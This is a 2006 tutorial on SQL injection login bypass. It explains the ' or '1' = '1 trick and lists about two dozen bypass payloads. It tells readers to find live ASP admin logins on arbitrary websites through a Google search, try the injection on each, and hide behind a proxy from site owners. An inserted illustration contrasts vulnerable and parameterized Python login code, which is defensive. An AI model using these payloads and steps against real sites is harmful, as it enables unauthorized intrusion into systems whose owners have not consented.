February 20, 2006

  • SQL Website Injection Tutorial


    Easy way to gain administrative access on a website
    By Citizin

This is a simple tutorial; it will tell you just what to do and how it works. Let's get to reading, eh?

Step 1 - What to do exactly
    Let's understand what we're going to do.

    You need a line of text/code that is true, and what do I mean by true?

Quote:
    '1' = '1'


That's true: 1 = 1 is true.
    How do we use that to our advantage?
    Well, let's see here.

    What does a username and password always check for?
    Username:Justin
    Password:PinkPanther

When you log in, it checks whether Justin's password equals PinkPanther. Since
    1 = 1 is already true, that's all we really need. There are lots of other
    injections you can make, so be creative; this one might not work on some
    websites as well as others do. For a list of other injections, read the
    bottom of the tutorial.

    Now to continue.
    The formatting is similar to this:

    Quote:
    "SELECT * FROM tblUser WHERE UserName = 'user' AND Password = 'pass';"

So when you type ' or '1' = '1 as both the username and the password, it looks like:

    Quote:
    "SELECT * FROM tblUser WHERE UserName = '' or '1' = '1' AND Password = '' or '1' = '1';"
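As an added illustration (not from the original post), here is the quoted query built the way the tutorial shows it, next to a parameterized version that treats the same input as plain data. The tblUser table, the Justin row and the two login functions are constructed for this example; the condition evaluates as UserName = '' OR ('1' = '1' AND Password = '') OR '1' = '1' because AND binds tighter than OR.

```python
import sqlite3


def make_db():
    # Constructed in-memory table with one sample user (not a real site).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblUser (UserName TEXT, Password TEXT)")
    conn.execute("INSERT INTO tblUser VALUES ('Justin', 'PinkPanther')")
    conn.commit()
    return conn


def login_vulnerable(conn, user, pw):
    # String concatenation, exactly as the quoted query in the tutorial:
    # whatever the user types becomes part of the SQL text itself.
    sql = ("SELECT * FROM tblUser WHERE UserName = '" + user
           + "' AND Password = '" + pw + "';")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, user, pw):
    # Bound parameters: the driver passes the values separately from the
    # statement, so quotes and keywords in the input are never parsed as SQL.
    sql = "SELECT * FROM tblUser WHERE UserName = ? AND Password = ?"
    return conn.execute(sql, (user, pw)).fetchall()


# The exact text from the tutorial, typed into both fields.
INJECTION = "' or '1' = '1"


def demo():
    # Returns how many rows each login check matches for real and injected input.
    conn = make_db()
    return {
        "vuln_real_creds": len(login_vulnerable(conn, "Justin", "PinkPanther")),
        "vuln_injected": len(login_vulnerable(conn, INJECTION, INJECTION)),
        "param_real_creds": len(login_parameterized(conn, "Justin", "PinkPanther")),
        "param_injected": len(login_parameterized(conn, INJECTION, INJECTION)),
    }


if __name__ == "__main__":
    print(demo())
```

The concatenated form matches the row for the injected input as well as for the real credentials; the parameterized form matches only the real credentials.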

Step 2 - So I understand how it works, but how do I get logins?

Well, Google is one of the top search engines, but it works as more
    than a search engine. Let's take a closer look at how we can find ASP
    logins with Google.

    1. Go to Google.com
    2. Type "login filetype:asp"
    3. Click on a link and type in the injection for username and password
4. If successful, you'll have the admin CP
    5. If not, return to #2 and try a different link

See, now the problem is a lot of these are going to get hit, so I
    suggest you start on page 15. A lot may not work, a lot may, so don't
    give up because the first 10 didn't work. I also suggest using a proxy. I
    got an email from some website saying that they were going to sue, some
    bullshit, but I was under a proxy and I tagged the site with my email,
    so that's the only thing they have of mine. Some webmasters may take this
    seriously, so be careful.

    Other Injections
    Here they be:

Code:
    admin'--
    ' or 0=0 --
    " or 0=0 --
    or 0=0 --
    ' or 0=0 #
    " or 0=0 #
    or 0=0 #
    ' or 'x'='x
    " or "x"="x
    ') or ('x'='x
    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or a=a--
    " or "a"="a
    ') or ('a'='a
    ") or ("a"="a
    hi" or "a"="a
    hi" or 1=1 --
    hi' or 1=1 --
    hi' or 'a'='a
    hi') or ('a'='a
    hi") or ("a"="a

Other SQL injections thanks to ComSec of GovernmentSecurity.

I hope this all helped you. I suggest reading up on injection to understand it a bit more.

    -Citizin

    www.gamerzplanet.net